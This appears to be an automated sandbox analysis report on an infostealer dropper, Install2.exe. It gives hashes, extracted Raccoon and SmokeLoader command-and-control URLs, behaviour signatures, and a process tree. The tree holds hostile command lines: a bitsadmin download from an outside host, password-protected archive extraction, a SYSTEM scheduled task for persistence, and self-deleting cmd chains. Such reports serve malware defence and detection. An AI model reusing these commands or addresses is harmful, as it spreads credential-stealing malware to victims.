Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1776s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-05-2021 08:37

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • TelegramRat 1 IoCs

    Telegram_rat.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 47 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 47 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 36 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 33 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 24 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Install2.exe
    "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:744
    • C:\Users\Admin\AppData\Local\Temp\is-1S4Q7.tmp\Install2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-1S4Q7.tmp\Install2.tmp" /SL5="$50032,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2424
      • C:\Users\Admin\AppData\Local\Temp\is-LL37E.tmp\Ultra.exe
        "C:\Users\Admin\AppData\Local\Temp\is-LL37E.tmp\Ultra.exe" /S /UID=burnerch1
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3344
        • C:\Program Files\Windows Security\BDKZWYMNAZ\ultramediaburner.exe
          "C:\Program Files\Windows Security\BDKZWYMNAZ\ultramediaburner.exe" /VERYSILENT
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1168
          • C:\Users\Admin\AppData\Local\Temp\is-S8JJ2.tmp\ultramediaburner.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-S8JJ2.tmp\ultramediaburner.tmp" /SL5="$7004E,281924,62464,C:\Program Files\Windows Security\BDKZWYMNAZ\ultramediaburner.exe" /VERYSILENT
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
              6⤵
              • Executes dropped EXE
              PID:2080
        • C:\Users\Admin\AppData\Local\Temp\8f-94c10-7f8-fd6b9-2beab5d9018a9\Qitesawyzhy.exe
          "C:\Users\Admin\AppData\Local\Temp\8f-94c10-7f8-fd6b9-2beab5d9018a9\Qitesawyzhy.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          PID:3560
        • C:\Users\Admin\AppData\Local\Temp\35-e0569-ccb-e60bf-987c4601f24a8\Dezhashyshysi.exe
          "C:\Users\Admin\AppData\Local\Temp\35-e0569-ccb-e60bf-987c4601f24a8\Dezhashyshysi.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4052
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u5d4zvui.hvm\KiffMainE1.exe & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4136
            • C:\Users\Admin\AppData\Local\Temp\u5d4zvui.hvm\KiffMainE1.exe
              C:\Users\Admin\AppData\Local\Temp\u5d4zvui.hvm\KiffMainE1.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4464
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pxkmlwlm.xrj\001.exe & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4452
            • C:\Users\Admin\AppData\Local\Temp\pxkmlwlm.xrj\001.exe
              C:\Users\Admin\AppData\Local\Temp\pxkmlwlm.xrj\001.exe
              6⤵
                PID:4716
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xdlonkfo.1on\installer.exe /qn CAMPAIGN="654" & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4648
              • C:\Users\Admin\AppData\Local\Temp\xdlonkfo.1on\installer.exe
                C:\Users\Admin\AppData\Local\Temp\xdlonkfo.1on\installer.exe /qn CAMPAIGN="654"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates connected drives
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:4844
                • C:\Windows\SysWOW64\msiexec.exe
                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xdlonkfo.1on\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xdlonkfo.1on\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620031282 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                  7⤵
                    PID:4324
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mjydyere.mme\gpooe.exe & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4908
                • C:\Users\Admin\AppData\Local\Temp\mjydyere.mme\gpooe.exe
                  C:\Users\Admin\AppData\Local\Temp\mjydyere.mme\gpooe.exe
                  6⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:5040
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    7⤵
                      PID:3972
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:3996
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:2236
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:6080
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eoyivojl.cx3\huesaa.exe & exit
                  5⤵
                    PID:5476
                    • C:\Users\Admin\AppData\Local\Temp\eoyivojl.cx3\huesaa.exe
                      C:\Users\Admin\AppData\Local\Temp\eoyivojl.cx3\huesaa.exe
                      6⤵
                      • Executes dropped EXE
                      PID:5556
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                        • Executes dropped EXE
                        PID:5628
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                        • Executes dropped EXE
                        PID:5364
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                        • Executes dropped EXE
                        PID:6048
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        7⤵
                        • Executes dropped EXE
                        PID:360
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3lppkggd.pbd\askinstall39.exe & exit
                    5⤵
                      PID:5652
                      • C:\Users\Admin\AppData\Local\Temp\3lppkggd.pbd\askinstall39.exe
                        C:\Users\Admin\AppData\Local\Temp\3lppkggd.pbd\askinstall39.exe
                        6⤵
                        • Executes dropped EXE
                        PID:5724
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c taskkill /f /im chrome.exe
                          7⤵
                            PID:6084
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im chrome.exe
                              8⤵
                              • Kills process with taskkill
                              PID:5276
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p3zxajjr.ffn\setup.exe & exit
                        5⤵
                          PID:5744
                          • C:\Users\Admin\AppData\Local\Temp\p3zxajjr.ffn\setup.exe
                            C:\Users\Admin\AppData\Local\Temp\p3zxajjr.ffn\setup.exe
                            6⤵
                            • Executes dropped EXE
                            PID:5876
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\p3zxajjr.ffn\setup.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:4716
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 1.1.1.1 -n 1 -w 3000
                                8⤵
                                • Runs ping.exe
                                PID:5328
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vmft5ov1.pov\y1.exe & exit
                          5⤵
                            PID:5916
                            • C:\Users\Admin\AppData\Local\Temp\vmft5ov1.pov\y1.exe
                              C:\Users\Admin\AppData\Local\Temp\vmft5ov1.pov\y1.exe
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:6100
                              • C:\Users\Admin\AppData\Local\Temp\IN5ilp2mKC.exe
                                "C:\Users\Admin\AppData\Local\Temp\IN5ilp2mKC.exe"
                                7⤵
                                  PID:5760
                                  • C:\Users\Admin\AppData\Roaming\1620290683731.exe
                                    "C:\Users\Admin\AppData\Roaming\1620290683731.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620290683731.txt"
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4756
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\IN5ilp2mKC.exe"
                                    8⤵
                                      PID:5788
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 127.0.0.1 -n 3
                                        9⤵
                                        • Runs ping.exe
                                        PID:5804
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\vmft5ov1.pov\y1.exe"
                                    7⤵
                                      PID:5252
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        8⤵
                                        • Delays execution with timeout.exe
                                        PID:4252
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oz1mzinr.5nm\Setup_v3.exe & exit
                                  5⤵
                                    PID:6116
                                    • C:\Users\Admin\AppData\Local\Temp\oz1mzinr.5nm\Setup_v3.exe
                                      C:\Users\Admin\AppData\Local\Temp\oz1mzinr.5nm\Setup_v3.exe
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5360
                                      • C:\Windows\SysWOW64\at.exe
                                        "C:\Windows\System32\at.exe"
                                        7⤵
                                          PID:5732
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                          7⤵
                                            PID:6112
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\System32\cmd.exe
                                              8⤵
                                                PID:5800
                                                • C:\Windows\SysWOW64\findstr.exe
                                                  findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                  9⤵
                                                    PID:2168
                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                    Fessura.exe.com Z
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:6072
                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:4188
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                        11⤵
                                                        • Creates scheduled task(s)
                                                        PID:5268
                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                        11⤵
                                                        • Executes dropped EXE
                                                        PID:5764
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping 127.0.0.1 -n 30
                                                    9⤵
                                                    • Runs ping.exe
                                                    PID:5600
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                7⤵
                                                  PID:1576
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\plye2k4p.jyy\toolspab1.exe & exit
                                              5⤵
                                                PID:2700
                                                • C:\Users\Admin\AppData\Local\Temp\plye2k4p.jyy\toolspab1.exe
                                                  C:\Users\Admin\AppData\Local\Temp\plye2k4p.jyy\toolspab1.exe
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2448
                                                  • C:\Users\Admin\AppData\Local\Temp\plye2k4p.jyy\toolspab1.exe
                                                    C:\Users\Admin\AppData\Local\Temp\plye2k4p.jyy\toolspab1.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:5736
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\41mzwmml.qmn\005.exe & exit
                                                5⤵
                                                  PID:5204
                                                  • C:\Users\Admin\AppData\Local\Temp\41mzwmml.qmn\005.exe
                                                    C:\Users\Admin\AppData\Local\Temp\41mzwmml.qmn\005.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:5548
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrlb1njs.y0b\SunLabsPlayer.exe /S & exit
                                                  5⤵
                                                    PID:1764
                                                    • C:\Users\Admin\AppData\Local\Temp\vrlb1njs.y0b\SunLabsPlayer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\vrlb1njs.y0b\SunLabsPlayer.exe /S
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      PID:4984
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5316
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:584
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:6008
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4324
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4616
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:6056
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                    7⤵
                                                                    • Checks for any installed AV software in registry
                                                                    PID:6124
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                    7⤵
                                                                    • Download via BitsAdmin
                                                                    PID:1040
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:5708
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4584
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:3964
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4032
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4356
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:4392
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5312
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                              7⤵
                                                                              • Loads dropped DLL
                                                                              PID:4100
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                • Drops file in System32 directory
                                                                                • Drops file in Program Files directory
                                                                                PID:4316
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:4552
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:6032
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                  • Drops file in Program Files directory
                                                                                  PID:3124
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    8⤵
                                                                                      PID:6056
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:4144
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6CB7.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:5852
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4972
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                            1⤵
                                                                            • Drops file in Windows directory
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:4180
                                                                          • C:\Windows\system32\browser_broker.exe
                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            PID:4540
                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:5112
